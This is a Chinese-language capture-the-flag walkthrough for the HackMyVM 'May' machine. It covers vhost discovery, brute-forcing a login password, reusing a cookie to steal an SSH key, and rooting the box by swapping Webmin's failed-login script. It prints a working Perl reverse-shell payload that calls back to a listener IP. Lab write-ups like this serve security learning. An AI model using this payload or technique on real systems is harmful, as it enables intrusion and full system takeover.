hackmyvm: may walkthrough

信息收集

访问80，会跳转到域名may.hmv访问，这里需添加hosts访问。

得到了一个用户明marie。
爆破目录未果，于是爆破vhost。

找到两个vhost，portal和ssh。添加hosts后访问portal.may.hmv。这个一个登录页面，会验证用户名和密码，尝试注入失败后，利用前面得到的用户名尝试爆破密码。

得到密码rebelde并成功获取到了cookie，将这个cookie注入到http://ssh.may.hmv/check.php的请求中去，成功获取marie用户的私钥。

获取user flag

将私钥保存，并设置为只可当前用户读写，ssh登录marie。

获取root flag

查看root用户进程，发现了如下进程。

查看miniserv.conf文件权限，发现marie可以直接编辑，于是在home目录下创建一个failed.pl替换掉默认的。

在failed.pl中加入了反弹shell代码。

[email protected]:~$ cat failed.pl 
#!/usr/bin/perl
use Socket;$i="192.168.143.135";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){
    open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
open(CONF, "</etc/webmin/miniserv.conf") || die "Failed to open /etc/webmin/miniserv.conf : $!";
while(<CONF>) {
    
        $root = $1 if (/^root=(.*)/);
        }
close(CONF);
$root || die "No root= line found in /etc/webmin/miniserv.conf";
$ENV{
    'PERLLIB'} = "$root";
$ENV{
    'WEBMIN_CONFIG'} = "/etc/webmin";
$ENV{
    'WEBMIN_VAR'} = "/var/webmin";
delete($ENV{
    'MINISERV_CONFIG'});
chdir("$root");
exec("$root/record-failed.pl", @ARGV) || die "Failed to run $root/record-failed.pl : $!";

利用sudo重启虚拟机（marie可以无密码执行sudo reboot）。重启后随便webmin登录一个错误账号就可以反弹root。